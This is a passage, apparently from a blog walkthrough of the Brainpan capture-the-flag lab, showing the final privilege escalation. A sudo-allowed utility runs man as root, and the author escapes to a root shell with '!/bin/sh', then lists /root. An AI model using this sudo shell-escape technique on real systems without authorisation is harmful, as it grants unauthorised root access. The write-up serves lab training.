
Hum.. doesn’t seem to be sensitive to buffer overflow…

Let’s go back to the menu…. We can enter a command

sudo /home/anansi/bin/anansi_util manual whoami
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
WHOAMI(1) User Commands WHOAMI(1)

NAME
whoami – print effective userid

SYNOPSIS
whoami [OPTION]…

DESCRIPTION
Print the user name associated with the current effective user ID.
Same as id -un.

OK so it’s running man! And according to https://gtfobins.github.io/gtfobins/man/, man can launch a shell…. and here the command is running as root!

BINGO!

puck@brainpan:/bin$ sudo /home/anansi/bin/anansi_util manual man man
!/bin/sh
sudo /home/anansi/bin/anansi_util manual man man
No manual entry for manual
WARNING: terminal is not fully functional
– (press RETURN)
!/bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
#

cd /root
# ll
ll
total 40
drwx—— 5 root root 4096 Mar 7 2013 .
drwxr-xr-x 22 root root 4096 Mar 4 2013 ..
drwx—— 2 root root 4096 Mar 4 2013 .aptitude
-rw——- 1 root root 0 Mar 7 2013 .bash_history
-rw-r–r– 1 root root 3106 Jul 3 2012 .bashrc
-rw-r–r– 1 root root 564 Mar 7 2013 b.txt
drwx—— 2 root root 4096 Mar 4 2013 .cache
-rw——- 1 root root 39 Mar 5 2013 .lesshst
-rw-r–r– 1 root root 140 Jul 3 2012 .profile
-rw-r–r– 1 root root 74 Mar 5 2013 .selected_editor
drwx—— 2 root root 4096 Mar 4 2013 .ssh
# cat b.txt
cat b.txt
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|

http://www.techorganic.com

Leave a Reply

Your email address will not be published. Required fields are marked *